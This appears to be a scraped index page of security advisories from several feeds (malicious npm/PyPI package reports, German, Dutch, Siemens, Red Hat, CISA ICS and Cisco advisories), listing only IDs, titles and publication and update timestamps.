mal-2024-1254 Malicious code in reqargs (PyPI) 2024-04-11T07:56:53Z 2024-04-12T03:34:32Z
mal-2024-1206 Malicious code in f3ngtest12345677 (npm) 2024-04-08T05:46:40Z 2024-04-12T03:34:31Z
mal-2024-1203 Malicious code in nespresso-bi (npm) 2024-04-05T10:06:35Z 2024-04-12T03:34:31Z
mal-2022-7444 Malicious code in @sdc-wob-type-3/group-ui (npm) 2022-06-20T21:09:09Z 2024-04-10T18:19:13Z
mal-2022-7443 Malicious code in @getstep/sdk (npm) 2022-06-20T20:13:50Z 2024-04-10T18:19:13Z
mal-2024-1243 Malicious code in @lbnqduy11805/turbo-octo-memory (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1240 Malicious code in @lbnqduy11805/sturdy-chainsaw (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1230 Malicious code in @lbnqduy11805/refactored-octo-carnival (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1227 Malicious code in @lbnqduy11805/psychic-waffle (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1216 Malicious code in @lbnqduy11805/congenial-octo-guide (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1213 Malicious code in @lbnqduy11805/bookish-sniffle (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:28Z
mal-2024-1245 Malicious code in @lbnqduy11805/verbose-pancake (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
mal-2024-1242 Malicious code in @lbnqduy11805/super-duper-train (npm) 2024-04-10T05:55:22Z 2024-04-10T05:55:22Z
mal-2024-1239 Malicious code in @lbnqduy11805/stunning-octo-parakeet (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
mal-2024-1233 Malicious code in @lbnqduy11805/silver-parakeet (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
mal-2024-1232 Malicious code in @lbnqduy11805/shiny-rotary-phone (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
mal-2024-1225 Malicious code in @lbnqduy11805/potential-octo-enigma (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
mal-2024-1224 Malicious code in @lbnqduy11805/potential-giggle (npm) 2024-04-10T05:55:21Z 2024-04-10T05:55:22Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-1244 Wireshark: Schwachstelle ermöglicht Denial of Service 2025-06-04T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1205 Golang Go: Mehrere Schwachstellen 2025-06-01T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1201 Linux Kernel: Mehrere Schwachstellen 2025-05-29T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1169 Apache Commons BeanUtils: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2025-05-29T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1165 Apache Tomcat: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2025-05-29T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1114 Linux Kernel: Mehrere Schwachstellen 2025-05-20T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1098 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2025-05-18T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1080 CPython: Schwachstelle ermöglicht Denial of Service 2025-05-15T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1069 WebKitGTK: Mehrere Schwachstellen 2025-05-14T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2025-1056 IBM Semeru Runtime: Mehrere Schwachstellen ermöglichen Denial of Service 2025-05-14T22:00:00.000+00:00 2025-07-10T22:00:00.000+00:00
wid-sec-w-2024-1754 Roundcube: Mehrere Schwachstellen 2024-08-04T22:00:00.000+00:00 2025-07-09T22:00:00.000+00:00
wid-sec-w-2025-1480 Red Hat Enterprise Linux (jq): Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-07T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1466 Red Hat Enterprise Linux (socat): Schwachstelle ermöglicht Manipulation von Dateien 2025-07-06T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1451 Drupal: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen 2025-07-02T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1430 Linux Kernel: Mehrere Schwachstellen 2025-06-30T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1413 Red Hat OpenShift Container Platform: Schwachstelle ermöglicht Denial of Service und Offenlegung 2025-06-26T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1389 Podman: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2025-06-24T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1371 FreeRDP: Schwachstelle ermöglicht Denial of Service 2025-06-22T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1279 Broadcom Fabric OS: Mehrere Schwachstellen 2025-06-10T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1245 Django: Schwachstelle ermöglicht Manipulation von Dateien 2025-06-04T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1204 systemd-coredump: Schwachstelle ermöglicht Offenlegung von Informationen 2025-06-01T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1145 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-05-26T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1134 Ghostscript: Schwachstelle ermöglicht Offenlegung von Informationen 2025-05-22T22:00:00.000+00:00 2025-07-08T22:00:00.000+00:00
wid-sec-w-2025-1467 Ruby on Rails: Mehrere Schwachstellen 2019-03-13T23:00:00.000+00:00 2025-07-07T22:00:00.000+00:00
wid-sec-w-2023-1042 Ruby: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2023-04-19T22:00:00.000+00:00 2025-07-06T22:00:00.000+00:00
wid-sec-w-2025-1455 F5 BIG-IP: Mehrere Schwachstellen 2019-05-23T22:00:00.000+00:00 2025-07-03T22:00:00.000+00:00
wid-sec-w-2025-1436 Google Chrome / Microsoft Edge: Schwachstelle ermöglicht Codeausführung 2025-06-30T22:00:00.000+00:00 2025-07-02T22:00:00.000+00:00
wid-sec-w-2025-1397 Google Chrome / Microsoft Edge: Mehrere Schwachstellen 2025-06-24T22:00:00.000+00:00 2025-06-30T22:00:00.000+00:00
wid-sec-w-2025-1130 Microsoft Edge: Schwachstelle ermöglicht Privilegieneskalation 2025-05-22T22:00:00.000+00:00 2025-06-29T22:00:00.000+00:00
wid-sec-w-2025-1407 McAfee Agent: Mehrere Schwachstellen 2022-04-13T22:00:00.000+00:00 2025-06-26T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ncsc-2025-0200 Kwetsbaarheden verholpen in IBM QRadar SIEM 2025-06-20T11:04:50.445218Z 2025-06-20T11:04:50.445218Z
ncsc-2025-0199 Kwetsbaarheid verholpen in Cisco AnyConnect VPN voor Meraki MX en Z 2025-06-19T08:42:22.673078Z 2025-06-19T08:42:22.673078Z
ncsc-2025-0198 Kwetsbaarheden verholpen in Veeam Backup 2025-06-18T12:18:39.049977Z 2025-06-18T12:18:39.049977Z
ncsc-2025-0197 Kwetsbaarheid verholpen in GeoServer 2025-06-18T10:17:42.472544Z 2025-06-18T10:17:42.472544Z
ncsc-2025-0195 Kwetsbaarheden verholpen in Apache Tomcat 2025-06-18T08:01:06.984131Z 2025-06-18T08:01:06.984131Z
ncsc-2025-0194 Kwetsbaarheden verholpen in Trend Micro Apex One en Apex Central 2025-06-12T11:12:33.408725Z 2025-06-12T11:12:33.408725Z
ncsc-2025-0193 Kwetsbaarheden verholpen in Ivanti Workspace Control 2025-06-12T11:08:41.247215Z 2025-06-12T11:08:41.247215Z
ncsc-2025-0192 Kwetsbaarheden verholpen in Fortinet FortiOS 2025-06-12T11:04:45.167843Z 2025-06-12T11:04:45.167843Z
ncsc-2025-0191 Kwetsbaarheden verholpen in Adobe Commerce en Magento 2025-06-11T06:58:19.840921Z 2025-06-11T06:58:19.840921Z
ncsc-2025-0190 Kwetsbaarheden verholpen in Microsoft Developer Tools 2025-06-10T18:46:10.932182Z 2025-06-10T18:46:10.932182Z
ncsc-2025-0189 Kwetsbaarheden verholpen in Microsoft Office 2025-06-10T18:45:25.061778Z 2025-06-10T18:45:25.061778Z
ncsc-2025-0182 Kwetsbaarheden verholpen in Google Chrome en Microsoft Edge 2025-06-03T07:52:36.009178Z 2025-06-10T18:44:36.060357Z
ncsc-2025-0188 Kwetsbaarheden verholpen in Microsoft Windows 2025-06-10T18:43:18.187461Z 2025-06-10T18:43:18.187461Z
ncsc-2025-0187 Kwetsbaarheden verholpen in Siemens producten 2025-06-10T13:11:56.672768Z 2025-06-10T13:11:56.672768Z
ncsc-2025-0186 Kwetsbaarheden verholpen in SAP Producten 2025-06-10T10:15:56.898255Z 2025-06-10T10:15:56.898255Z
ncsc-2025-0185 Kwetsbaarheden verholpen in Google Android en Samsung Mobile 2025-06-10T07:19:02.701613Z 2025-06-10T07:19:02.701613Z
ncsc-2025-0181 Kwetsbaarheid verholpen in Roundcube Webmail 2025-06-02T09:04:58.900416Z 2025-06-05T14:19:00.303593Z
ncsc-2025-0184 Kwetsbaarheden verholpen in HPE StoreOnce Software 2025-06-05T10:37:04.196801Z 2025-06-05T10:37:04.196801Z
ncsc-2025-0183 Kwetsbaarheid verholpen in Cisco Identity Services Engine voor cloudplatformen 2025-06-05T10:25:46.291683Z 2025-06-05T10:25:46.291683Z
ncsc-2025-0180 Kwetsbaarheid verholpen in IBM Tivoli Monitoring 2025-06-02T09:00:25.515472Z 2025-06-02T09:00:25.515472Z
ncsc-2025-0179 Kwetsbaarheid verholpen in Siemens SiPass Integrated 2025-05-27T11:42:46.878569Z 2025-05-27T11:42:46.878569Z
ncsc-2025-0178 Kwetsbaarheden verholpen in Infoblox NETMRI 2025-05-23T08:55:37.586046Z 2025-05-23T08:55:37.586046Z
ncsc-2025-0177 Kwetsbaarheden verholpen in ABB ASPECT-productlijn 2025-05-23T08:40:56.272804Z 2025-05-23T08:40:56.272804Z
ncsc-2025-0176 Kwetsbaarheden verholpen in GitLab 2025-05-23T08:38:34.688022Z 2025-05-23T08:38:34.688022Z
ncsc-2025-0175 Kwetsbaarheden verholpen in Trend Micro Apex Central 2025-05-23T08:28:52.215347Z 2025-05-23T08:28:52.215347Z
ncsc-2025-0174 Kwetsbaarheden verholpen in Cisco Unified Intelligence Center 2025-05-22T08:14:14.245836Z 2025-05-22T08:14:14.245836Z
ncsc-2025-0173 Kwetsbaarheid verholpen in Cisco Identity Services Engine 2025-05-22T08:14:06.046824Z 2025-05-22T08:14:06.046824Z
ncsc-2025-0172 Kwetsbaarheden verholpen in Cisco Webex 2025-05-22T08:13:51.228348Z 2025-05-22T08:13:51.228348Z
ncsc-2025-0171 Kwetsbaarheden verholpen in VMware producten 2025-05-21T13:08:22.714183Z 2025-05-21T13:08:22.714183Z
ncsc-2025-0170 Kwetsbaarheden verholpen in VMware Cloud Foundation 2025-05-21T09:12:05.676292Z 2025-05-21T09:12:05.676292Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-874353 SSA-874353: Entity Enumeration Vulnerability in Mendix Runtime 2025-04-08T00:00:00Z 2025-06-10T00:00:00Z
ssa-858251 SSA-858251: Authentication Bypass Vulnerabilities in OPC UA 2025-03-11T00:00:00Z 2025-06-10T00:00:00Z
ssa-693776 SSA-693776: Multiple Vulnerabilities in Industrial Communication Devices based on SINEC OS before V3.2 2025-06-10T00:00:00Z 2025-06-10T00:00:00Z
ssa-656895 SSA-656895: Open Redirect Vulnerability in Teamcenter 2025-02-11T00:00:00Z 2025-06-10T00:00:00Z
ssa-633269 SSA-633269: Incorrect Authorization Check Vulnerability in Industrial Communication Devices based on SINEC OS before V3.1 2025-06-10T00:00:00Z 2025-06-10T00:00:00Z
ssa-620799 SSA-620799: Denial of Service Vulnerability During BLE Pairing in SENTRON Powercenter 1000/1100 2024-12-10T00:00:00Z 2025-06-10T00:00:00Z
ssa-497656 SSA-497656: Multiple NTP Vulnerabilities in TIM 4R-IE Devices 2021-04-13T00:00:00Z 2025-06-10T00:00:00Z
ssa-486186 SSA-486186: Out of Bounds Read Vulnerability in Tecnomatix Plant Simulation Before 2404 2025-06-10T00:00:00Z 2025-06-10T00:00:00Z
ssa-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP >= V3.1.0 and < V3.1.5 2023-12-12T00:00:00Z 2025-06-10T00:00:00Z
ssa-354569 SSA-354569: Multiple Vulnerabilities in Palo Alto Networks PAN-OS on RUGGEDCOM APE1808 Devices 2024-11-22T00:00:00Z 2025-06-10T00:00:00Z
ssa-340240 SSA-340240: Denial of Service Vulnerability in SIRIUS 3RV2921-5M 2024-10-08T00:00:00Z 2025-06-10T00:00:00Z
ssa-301229 SSA-301229: Client-Side Enforcement of Server-Side Security Vulnerabilities in RUGGEDCOM ROX II 2025-05-13T00:00:00Z 2025-06-10T00:00:00Z
ssa-216014 SSA-216014: Vulnerabilities in EFI variable of SIMATIC IPCs, SIMATIC Tablet PCs, and SIMATIC Field PGs 2025-03-11T00:00:00Z 2025-06-10T00:00:00Z
ssa-162506 SSA-162506: DHCP Client Vulnerability in SIMOTICS CONNECT 400, Desigo PXC/PXM, APOGEE MEC/MBC/PXC, APOGEE PXC Series, and TALON TC Series 2020-04-14T00:00:00Z 2025-06-10T00:00:00Z
ssa-082556 SSA-082556: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1.5 2025-06-10T00:00:00Z 2025-06-10T00:00:00Z
ssa-054046 SSA-054046: Unauthenticated Information Disclosure in Web Server of SIMATIC S7-1500 CPUs 2024-10-08T00:00:00Z 2025-06-10T00:00:00Z
ssa-367714 SSA-367714: Improper Integrity Check of Firmware Updates in SiPass integrated AC5102 / ACC-G2 and ACC-AP 2025-05-23T00:00:00Z 2025-05-23T00:00:00Z
ssa-041082 SSA-041082: Out of Bounds Read Vulnerability in SiPass Integrated Before V2.95.3.18 2025-05-23T00:00:00Z 2025-05-23T00:00:00Z
ssa-556937 SSA-556937: Multiple Vulnerabilities in VersiCharge AC Series EV Chargers 2025-05-13T00:00:00Z 2025-05-14T00:00:00Z
ssa-552330 SSA-552330: System Configuration Password Reset in Siveillance Video V2024 R1 2025-05-14T00:00:00Z 2025-05-14T00:00:00Z
ssa-935500 SSA-935500: Denial of Service Vulnerability in FTP Server of Nucleus RTOS based APOGEE, TALON and Desigo PXC/PXM Products 2022-10-11T00:00:00Z 2025-05-13T00:00:00Z
ssa-901508 SSA-901508: Multiple Vulnerabilities in INTRALOG WMS Before V5 2025-05-13T00:00:00Z 2025-05-13T00:00:00Z
ssa-832273 SSA-832273: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.3 on RUGGEDCOM APE1808 Devices 2024-03-12T00:00:00Z 2025-05-13T00:00:00Z
ssa-828116 SSA-828116: Denial of Service Vulnerability in BACnet ATEC Devices 2025-05-13T00:00:00Z 2025-05-13T00:00:00Z
ssa-819629 SSA-819629: Weak Authentication Vulnerability in Industrial Edge Device Kit 2025-04-08T00:00:00Z 2025-05-13T00:00:00Z
ssa-794185 SSA-794185: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SIPROTEC, SICAM and Related Products 2025-05-13T00:00:00Z 2025-05-13T00:00:00Z
ssa-767615 SSA-767615: Information Disclosure Vulnerability in SIPROTEC 5 Devices 2025-02-11T00:00:00Z 2025-05-13T00:00:00Z
ssa-718393 SSA-718393: Partial Denial of Service Vulnerability in APOGEE PXC and TALON TC Series (BACnet) Devices 2025-05-13T00:00:00Z 2025-05-13T00:00:00Z
ssa-673996 SSA-673996: Buffer Overflow Vulnerability in Third-Party Component in SICAM and SITIPE Products 2024-09-10T00:00:00Z 2025-05-13T00:00:00Z
ssa-668154 SSA-668154: Denial of Service Vulnerability in MS/TP Point Pickup Module 2025-05-13T00:00:00Z 2025-05-13T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2023:6842 Red Hat Security Advisory: OpenShift Container Platform 4.12.43 bug fix and security update 2023-11-16T20:31:52+00:00 2025-07-12T23:48:50+00:00
rhsa-2023:7604 Red Hat Security Advisory: OpenShift Container Platform 4.13.25 bug fix and security update 2023-12-06T00:34:23+00:00 2025-07-12T23:48:47+00:00
rhsa-2023:7201 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 packages and security update 2024-02-27T22:34:13+00:00 2025-07-12T23:48:47+00:00
rhsa-2023:7470 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 bug fix and security update 2023-11-29T11:36:57+00:00 2025-07-12T23:48:44+00:00
rhsa-2024:0290 Red Hat Security Advisory: OpenShift Container Platform 4.14.10 bug fix and security update 2024-01-23T20:26:08+00:00 2025-07-12T23:48:42+00:00
rhsa-2023:7741 Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update 2023-12-12T13:55:37+00:00 2025-07-12T23:48:41+00:00
rhsa-2023:6841 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-11-16T20:14:47+00:00 2025-07-12T23:48:41+00:00
rhsa-2024:0050 Red Hat Security Advisory: OpenShift Container Platform 4.14.8 bug fix and security update 2024-01-09T16:55:38+00:00 2025-07-12T23:48:39+00:00
rhsa-2023:7602 Red Hat Security Advisory: OpenShift Container Platform 4.13.25 security and extras update 2023-12-06T00:16:04+00:00 2025-07-12T23:48:37+00:00
rhsa-2023:7200 Red Hat Security Advisory: OpenShift Container Platform 4.15.z security update 2024-02-27T22:49:18+00:00 2025-07-12T23:48:36+00:00
rhsa-2023:7469 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 security and extras update 2023-11-29T10:27:24+00:00 2025-07-12T23:48:35+00:00
rhsa-2023:6817 Red Hat Security Advisory: OpenShift Virtualization 4.14.0 Images security and bug fix update 2023-11-08T14:03:27+00:00 2025-07-12T23:48:34+00:00
rhsa-2023:7710 Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 7.2.0 security update 2023-12-11T00:20:04+00:00 2025-07-12T23:48:33+00:00
rhsa-2023:6839 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 security update 2023-11-16T05:56:26+00:00 2025-07-12T23:48:32+00:00
rhsa-2024:0298 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.9.2 security and bug fix container updates 2024-01-18T16:35:58+00:00 2025-07-12T23:48:30+00:00
rhsa-2023:7823 Red Hat Security Advisory: OpenShift Container Platform 4.12.46 bug fix and security update 2024-01-04T14:41:38+00:00 2025-07-12T23:48:28+00:00
rhsa-2023:7599 Red Hat Security Advisory: OpenShift Container Platform 4.14.5 bug fix and security update 2023-12-05T09:57:03+00:00 2025-07-12T23:48:27+00:00
rhsa-2023:7475 Red Hat Security Advisory: OpenShift Container Platform 4.13.24 bug fix and security update 2023-11-29T01:47:09+00:00 2025-07-12T23:48:25+00:00
rhsa-2023:6788 Red Hat Security Advisory: Red Hat OpenShift GitOps security update 2023-11-08T02:05:06+00:00 2025-07-12T23:48:25+00:00
rhsa-2023:7197 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 security and extras update 2024-02-27T19:47:37+00:00 2025-07-12T23:48:24+00:00
rhsa-2023:7704 Red Hat Security Advisory: OpenShift Virtualization 4.14.1 security and bug fix update 2023-12-07T15:00:28+00:00 2025-07-12T23:48:22+00:00
rhsa-2023:6840 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 packages and security update 2023-11-15T07:24:02+00:00 2025-07-12T23:48:22+00:00
rhsa-2024:0273 Red Hat Security Advisory: OpenShift Virtualization 4.12.9 Images security and bug fix update 2024-01-17T08:29:36+00:00 2025-07-12T23:48:19+00:00
rhsa-2023:7827 Red Hat Security Advisory: OpenShift Container Platform 4.13.z security update 2024-01-04T14:22:05+00:00 2025-07-12T23:48:16+00:00
rhsa-2023:7478 Red Hat Security Advisory: OpenShift Container Platform 4.11.54 security and extras update 2023-11-29T00:44:58+00:00 2025-07-12T23:48:16+00:00
rhsa-2023:6787 Red Hat Security Advisory: Network Observability security update 2023-11-08T01:54:46+00:00 2025-07-12T23:48:16+00:00
rhsa-2023:6279 Red Hat Security Advisory: cert-manager Operator for Red Hat OpenShift 1.11.5 2023-11-15T01:08:30+00:00 2025-07-12T23:48:16+00:00
rhsa-2023:6894 Red Hat Security Advisory: OpenShift Container Platform 4.12.44 bug fix and security update 2023-11-21T12:36:12+00:00 2025-07-12T23:48:15+00:00
rhsa-2023:7703 Red Hat Security Advisory: Red Hat OpenShift Pipelines 1.10.6 release and security update 2023-12-07T14:57:07+00:00 2025-07-12T23:48:13+00:00
rhsa-2023:6836 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 security and extras update 2023-11-15T00:47:45+00:00 2025-07-12T23:48:13+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
icsa-25-184-03 Mitsubishi Electric MELSOFT Update Manager 2025-07-03T06:00:00.000000Z 2025-07-03T06:00:00.000000Z
icsa-25-184-02 Hitachi Energy MicroSCADA X SYS600 2025-07-03T06:00:00.000000Z 2025-07-03T06:00:00.000000Z
va-25-169-01 Versa Networks Versa Director multiple vulnerabilities 2025-07-02T20:57:00Z 2025-07-02T20:57:00Z
icsa-25-182-05 Voltronic Power and PowerShield UPS monitoring software 2025-07-01T06:00:00.000000Z 2025-07-01T06:00:00.000000Z
icsa-16-306-02 IBHsoftec S7-SoftPLC CPX43 Heap-based Buffer Overflow Vulnerability 2016-08-05T06:00:00.000000Z 2025-06-26T14:48:20.911473Z
icsa-16-287-07a Kabona AB WDC Vulnerabilities (Update A) 2016-07-17T06:00:00.000000Z 2025-06-26T14:47:55.479923Z
icsa-25-177-01 Mitsubishi Electric Air Conditioning Systems 2025-06-26T06:00:00.000000Z 2025-06-26T06:00:00.000000Z
icsa-25-177-02 TrendMakers Sight Bulb Pro 2025-06-26T05:00:00.000000Z 2025-06-26T05:00:00.000000Z
icsa-15-202-02 Siemens Sm@rtClient Password Storage Vulnerability 2015-04-23T06:00:00.000000Z 2025-06-25T22:54:14.268360Z
icsa-15-202-01 Siemens SIPROTEC Denial-of-Service Vulnerability 2015-04-23T06:00:00.000000Z 2025-06-25T22:54:08.041405Z
icsa-15-062-02 Rockwell Automation FactoryTalk DLL Hijacking Vulnerabilities 2015-12-04T07:00:00.000000Z 2025-06-25T22:54:01.269590Z
icsa-14-086-01a Schneider Electric Serial Modbus Driver Buffer Overflow (Update A) 2014-12-28T07:00:00.000000Z 2025-06-25T22:09:32.885385Z
icsa-13-254-01 Siemens SCALANCE X-200 Web Hijack Vulnerability 2013-06-14T06:00:00.000000Z 2025-06-25T21:45:19.939275Z
icsa-13-140-01 Mitsubishi Electric Automation MX Component V3 ActiveX Vulnerability 2013-02-21T07:00:00.000000Z 2025-06-25T21:45:13.353340Z
icsa-12-256-01 Siemens WinCC WebNavigator Multiple Vulnerabilities 2012-06-16T06:00:00.000000Z 2025-06-25T18:57:28.717208Z
icsa-12-145-02 xArrow Multiple Vulnerabilities 2012-02-25T07:00:00.000000Z 2025-06-25T18:57:03.441531Z
icsa-11-122-01 AzeoTech DAQFactory Networking Vulnerabilities 2011-02-02T07:00:00.000000Z 2025-06-25T18:13:52.027870Z
icsa-16-231-01-0 Locus Energy LGate Command Injection Vulnerability 2016-05-22T06:00:00.000000Z 2025-06-25T18:13:45.800180Z
icsa-16-231-01 Navis WebAccess SQL Injection Vulnerability 2016-05-22T06:00:00.000000Z 2025-06-25T18:13:39.538321Z
icsa-16-208-01c Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional Vulnerabilities (Update C) 2016-04-29T06:00:00.000000Z 2025-06-25T18:13:26.602224Z
icsa-16-189-01 WECON LeviStudio Buffer Overflow Vulnerabilities 2016-04-10T06:00:00.000000Z 2025-06-25T15:02:08.772345Z
icsa-15-335-02 Schneider Electric ProClima ActiveX Control Vulnerabilities 2015-09-03T06:00:00.000000Z 2025-06-25T15:02:02.107190Z
icsa-25-184-01 Hitachi Energy Relion 670/650 and SAM600-IO Series 2025-06-24T12:30:00.000000Z 2025-06-24T12:30:00.000000Z
icsa-25-182-07 Hitachi Energy MSM 2025-06-24T12:30:00.000000Z 2025-06-24T12:30:00.000000Z
icsa-25-182-06 Hitachi Energy Relion 670/650 and SAM600-IO Series 2025-06-24T12:30:00.000000Z 2025-06-24T12:30:00.000000Z
icsa-25-175-07 MICROSENS NMP Web+ 2025-06-24T06:00:00.000000Z 2025-06-24T06:00:00.000000Z
icsa-25-175-06 Parsons AccuWeather widget 2025-06-24T06:00:00.000000Z 2025-06-24T06:00:00.000000Z
icsa-25-175-05 ControlID iDSecure On-premises 2025-06-24T06:00:00.000000Z 2025-06-24T06:00:00.000000Z
icsa-25-175-02 Delta Electronics CNCSoft 2025-06-24T06:00:00.000000Z 2025-06-24T06:00:00.000000Z
icsa-25-175-01 Kaleris Navis N4 Terminal Operating System 2025-06-24T06:00:00.000000Z 2025-06-24T06:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-cucm-kkhzbhr5 Cisco Unified Communications Products Privilege Escalation Vulnerability 2025-05-21T16:00:00+00:00 2025-05-21T16:00:00+00:00
cisco-sa-contcent-insuffacces-ardovhn8 Cisco Unified Contact Center Enterprise Cloud Connect Insufficient Access Control Vulnerability 2025-05-21T16:00:00+00:00 2025-05-21T16:00:00+00:00
cisco-sa-sdwanarbfile-2zkhkzwj Cisco Catalyst SD-WAN Manager Arbitrary File Creation Vulnerability 2025-05-07T16:00:00+00:00 2025-05-14T20:04:53+00:00
cisco-sa-sdwan-fileoverwrite-uc9txwh Cisco Catalyst SD-WAN Manager Arbitrary File Overwrite Vulnerability 2025-05-07T16:00:00+00:00 2025-05-08T15:55:57+00:00
cisco-sa-wlc-wncd-p6gvt6hl Cisco IOS XE Software for WLC Wireless IPv6 Clients Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-webui-multi-arnhm4v6 Cisco IOS XE Software Web-Based Management Interface Vulnerabilities 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-webui-cmdinj-gvn3oknc Cisco IOS XE Software Web-Based Management Interface Command Injection Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-vmanage-xss-xhn8m5jt Cisco Catalyst SD-WAN Manager Stored Cross-Site Scripting Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-vmanage-html-inj-gxvtk6zj Cisco Catalyst SD-WAN Manager Reflected HTML Injection Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-twamp-kv4fhugn Cisco IOS, IOS XE, and IOS XR Software TWAMP Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-snmpv3-qkeyvzsy Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-snmp-bypass-hhuvujdn Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-sisf-dos-zgwt4ddy Multiple Cisco Products Switch Integrated Security Features DHCPv6 Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-sdwan-priviesc-wck7bmmt Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-netconf-nacm-bypass-tgzv9pmq Cisco IOS XE Software Model-Driven Programmability Authorization Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-multiprod-ikev2-dos-gpctuqv2 Cisco Adaptive Security Appliance Software, Firepower Threat Defense Software, IOS Software, and IOS XE Software IKEv2 Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-ipsgacl-pg6qfzk Cisco IOS Software on Cisco Catalyst 1000 and 2960L Switches Access Control List Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-iox-dos-95fqnf7b Cisco IOx Application Hosting Environment Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-iosxe-privesc-su7scvdp Cisco IOS XE Software Privilege Escalation Vulnerabilities 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-iosxe-ikev1-dos-xhk3hzfc Cisco IOS XE Software Internet Key Exchange Version 1 Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
